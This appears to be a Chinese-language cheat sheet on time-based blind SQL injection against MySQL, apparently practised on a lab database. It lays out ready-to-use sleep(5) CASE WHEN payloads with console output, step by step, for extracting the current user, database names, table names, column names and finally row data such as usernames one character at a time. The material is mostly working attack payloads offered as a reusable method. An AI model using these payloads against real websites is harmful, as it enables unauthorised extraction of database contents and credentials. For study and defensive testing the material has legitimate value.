0x00 记忆方式

and case when(substring(表达式 from 1 for 1)=判断条件) then sleep(5) else 0 end;

0x01 基本数据

  1. mysql> select version();
  2. +-----------+
  3. | version() |
  4. +-----------+
  5. | 5.5.53 |
  6. +-----------+
  7. 1 row in set (0.27 sec)
  8. mysql> select user();
  9. +----------------+
  10. | user() |
  11. +----------------+
  12. | root@localhost |
  13. +----------------+
  14. 1 row in set (0.00 sec)
  15. mysql> select database();
  16. +------------+
  17. | database() |
  18. +------------+
  19. | security |
  20. +------------+
  21. 1 row in set (0.00 sec)

0x02 获取数据长度

  1. mysql> select length(user());
  2. +----------------+
  3. | length(user()) |
  4. +----------------+
  5. | 14 |
  6. +----------------+
  7. 1 row in set (0.00 sec)

数据库语句: select * from users where id=1 and case when(length(user())=14) then sleep(5) else 0 end;

  1. mysql> select * from users where id=1 and case when(length(user())=14) then sleep(5) else 0 end;
  2. Empty set (5.01 sec)

0x03 读取数据库版本/当前连接用户/当前连接的数据库

注意: 读取不同的内容
例如:
select substring(user() from 1 for 1) = r
select substring(user() from 2 for 1) = o

数据库语句: select * from users where id=1 and case when(substring(user() from 1 for 1)=’r’) then sleep(5) else 0 end;

  1. mysql> select * from users where id=1 and case when(substring(user() from 1 for 1)='r') then sleep(5) else 0 end;
  2. Empty set (5.01 sec)

猜对时会延时5秒,一旦延时了5S就可以判断为猜对了

0x04 猜库名

注意: OFFSET 0 修改会显示其他库名
例如:
修改为0 就是出1库
修改为1 就是出2库

  1. // 演示数据
  2. mysql> SELECT schema_name FROM information_schema.schemata LIMIT 0,1;
  3. +--------------------+
  4. | schema_name |
  5. +--------------------+
  6. | information_schema |
  7. +--------------------+
  8. 1 row in set (0.00 sec)

读取1库库名第一个字: select * from users where id=1 and case when(substring((SELECT schema_name FROM information_schema.schemata LIMIT 1 OFFSET 0) from 1 for 1)=’i’) then sleep(5) else 0 end;

  1. mysql> select * from users where id=1 and case when(substring((SELECT schema_name FROM information_schema.schemata LIMIT 1 OFFSET 0) from 1 for 1)='i') then sleep(5) else 0 end;
  2. Empty set (5.01 sec)

读取1库库名第二个字: select * from users where id=1 and case when(substring((SELECT schema_name FROM information_schema.schemata LIMIT 1 OFFSET 0) from 2 for 1)=’n’) then sleep(5) else 0 end;

  1. mysql> select * from users where id=1 and case when(substring((SELECT schema_name FROM information_schema.schemata LIMIT 1 OFFSET 0) from 2 for 1)='n') then sleep(5) else 0 end;
  2. Empty set (5.00 sec)

0x05 猜表名

注意: table_schema=xxx 修改为其他库会爆出其他库的数据
例如:
table_schema=database() 会获取当前连接的库数据
table_schema=’test’ 会获取test库数据

注意: OFFSET 0 修改会显示其他表名

  1. mysql> SELECT table_name FROM information_schema.tables where table_schema=database() LIMIT 4 OFFSET 0;
  2. +------------+
  3. | table_name |
  4. +------------+
  5. | emails |
  6. | referers |
  7. | uagents |
  8. | users |
  9. +------------+
  10. 4 rows in set (0.00 sec)
  11. mysql> SELECT table_name FROM information_schema.tables where table_schema=database() LIMIT 2 OFFSET 0;
  12. +------------+
  13. | table_name |
  14. +------------+
  15. | emails |
  16. | referers |
  17. +------------+
  18. 2 rows in set (0.00 sec)

例如:
修改为0 就是出1表
修改为1 就是出2表

  1. // 演示数据
  2. mysql> SELECT table_name FROM information_schema.tables where table_schema=database() LIMIT 0,1;
  3. +------------+
  4. | table_name |
  5. +------------+
  6. | emails |
  7. +------------+
  8. 1 row in set (0.00 sec)

数据库语句-读取当前库的第一张表名的第一个字: select * from users where id=1 and case when(substring((SELECT table_name FROM information_schema.tables where table_schema=database() LIMIT 1 OFFSET 0) from 1 for 1)=’e’) then sleep(5) else 0 end;

  1. mysql> select * from users where id=1 and case when(substring((SELECT table_name FROM information_schema.tables where table_schema=database() LIMIT 1 OFFSET 0) from 1 for 1)='e') then sleep(5) else 0 end;
  2. Empty set (5.01 sec)

数据库语句-读取当前库的第一张表名的第二个字: select * from users where id=1 and case when(substring((SELECT table_name FROM information_schema.tables where table_schema=database() LIMIT 1 OFFSET 0) from 2 for 1)=’m’) then sleep(5) else 0 end;

  1. mysql> select * from users where id=1 and case when(substring((SELECT table_name FROM information_schema.tables where table_schema=database() LIMIT 1 OFFSET 0) from 2 for 1)='m') then sleep(5) else 0 end;
  2. Empty set (5.02 sec)

0x06 猜字段

table_schema = “xx” 要爆的数据库名
table_name = “xx” 要爆的表名

OFFSET 0 表示要爆的位置

例如:
表tdb_admin的字段为 id,usernam,password
limit 0 = id
limit 1 = username
limit 2 = password

  1. // 演示数据
  2. mysql> SELECT column_name FROM information_schema.columns where table_schema='security' and table_name='users' limit 0,1;
  3. +-------------+
  4. | column_name |
  5. +-------------+
  6. | id |
  7. +-------------+
  8. 1 row in set (0.00 sec)

猜test库 tdb_admin表的第一个字段名第一个字: select * from users where id=1 and case when(substring((SELECT column_name FROM information_schema.columns where table_schema=’security’ and table_name=’users’ LIMIT 1 OFFSET 0) from 1 for 1)=’i’) then sleep(5) else 0 end;

  1. mysql> select * from users where id=1 and case when(substring((SELECT column_name FROM information_schema.columns where table_schema='security' and table_name='users' LIMIT 1 OFFSET 0) from 1 for 1)='i') then sleep(5) else 0 end;
  2. Empty set (5.01 sec)

猜security库users表的第一个字段名第二个字: select * from users where id=1 and case when(substring((SELECT column_name FROM information_schema.columns where table_schema=’security’ and table_name=’users’ LIMIT 1 OFFSET 0) from 2 for 1)=’d’) then sleep(5) else 0 end;

  1. mysql> select * from users where id=1 and case when(substring((SELECT column_name FROM information_schema.columns where table_schema='security' and table_name='users' LIMIT 1 OFFSET 0) from 2 for 1)='d') then sleep(5) else 0 end;
  2. Empty set (5.00 sec)

0x07 猜内容

OFFSET 0 第几条数据 下标从0开始
from 1 第几个字

  1. // 演示数据
  2. mysql> SELECT * FROM users LIMIT 1 OFFSET 0;
  3. +----+----------+----------+
  4. | id | username | password |
  5. +----+----------+----------+
  6. | 1 | Dumb | Dumb |
  7. +----+----------+----------+
  8. 1 row in set (0.00 sec)

读取某库某表某字段第一个字: select * from users where id=1 and case when(substring((SELECT 字段名 FROM 库名.表名 LIMIT 1 OFFSET 0) from 1 for 1)=’a’) then sleep(5) else 0 end;

  1. mysql> select * from users where id=1 and case when(substring((SELECT username FROM security.users LIMIT 1 OFFSET 0) from 1 for 1)='D') then sleep(5) else 0 end;
  2. Empty set (5.00 sec)

读取某库某表某字段第二个字: select * from users where id=1 and case when(substring((SELECT username FROM security.users LIMIT 1 OFFSET 0) from 2 for 1)=’u’) then sleep(5) else 0 end;

  1. mysql> select * from users where id=1 and case when(substring((SELECT username FROM security.users LIMIT 1 OFFSET 0) from 2 for 1)='u') then sleep(5) else 0 end;
  2. Empty set (5.01 sec)